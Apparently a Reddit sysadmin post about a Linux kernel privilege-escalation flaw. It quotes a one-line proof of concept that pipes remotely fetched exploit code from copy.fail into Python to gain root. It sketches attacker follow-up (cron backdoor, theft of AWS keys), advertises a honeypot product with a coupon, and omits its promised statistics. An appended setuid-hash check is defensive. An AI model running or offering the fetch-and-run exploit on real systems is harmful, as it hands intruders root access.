CVE-2026-31431 (Copy Fail) is 732 bytes of Python and roots any Linux from 2017+. The boring part is where you actually get owned

Posted by ZookeepergameHead380@reddit | sysadmin | 3 comments

Disclosure dropped this week at copy.fail. Logic flaw in the kernel's authencesn, reachable via AF_ALG, abused through splice() to write 4 bytes into the page cache of any setuid binary. 732 bytes of stdlib Python. No race, no offsets, reliable on every affected distro since 2017.

PoC:

curl https://copy.fail/exp | python3 && su

Distros are patching. Fine.

The bit nobody talks about: it's a local priv esc. The attacker still needs a shell first.

That shell doesn't come from your hardened SSH. It comes from the WordPress plugin you forgot was installed. The Grafana on :3000. The Jenkins your CI team spun up two years ago. The leaked GitHub PAT in a public gist. The n-day on your firewall vendor that everyone is still patching.

They land as www-data. They run the 732-byte one-liner. They're root. Backdoor in /etc/cron.d/. known_hosts dumped. AWS keys pulled from ~/.aws/credentials. Your Ansible inventory is now their target list. Friday they're inside. Sunday they push. Monday your /home is on a leak site and you're explaining to legal why prod creds lived on a Jenkins worker.

I run a honeypot (TarPit.pro, full disclosure). Across 5 of my own boxes in the last 20 days:

Those are the IPs you collected the last few months that, today, will be running curl copy.fail/exp | python3 on whichever box they land on first.

Patch the kernel. Then close the on-ramp. Single Go binary, free tier on 2 servers, no Docker. Coupon LAUNCH101 makes Starter and Pro free for 2 months if you want it on more
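An added defensive check, not from the post or from copy.fail: baseline the content hashes of every setuid binary and re-verify them on a schedule. It assumes that, because read() is served from the page cache, a write into a setuid binary's cached pages of the kind the post describes changes what sha256sum reads even though the on-disk blocks are untouched, so the mismatch shows up until the page is evicted; the function names are mine.

```shell
#!/bin/sh
# Added example: integrity baseline for setuid binaries (not the post's code).
# Assumption: a page-cache write to a setuid binary is visible to read(), so a
# content hash taken afterwards differs from one taken before the tampering.

# Print every setuid file under $1 (default /), one path per line, sorted.
list_setuid() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null | LC_ALL=C sort
}

# Record "sha256  path" for each setuid file under $1 into baseline file $2.
# Run this right after patching, from a known-good state.
baseline_setuid() {
    list_setuid "$1" | while IFS= read -r f; do
        sha256sum "$f"
    done > "$2"
}

# Re-hash the files named in baseline $1. Exit 0 if all still match, 1 if any
# hash differs or a file is missing (the failing path is printed to stdout).
verify_setuid() {
    sha256sum -c --quiet "$1" 2>/dev/null
}

# Number of baseline entries that no longer verify, for cron/alerting use.
count_setuid_mismatches() {
    sha256sum -c "$1" 2>/dev/null | grep -c -v ': OK$' || true
}
```

Keep the baseline file somewhere an unprivileged shell cannot write, and alert on any non-zero count rather than just logging it.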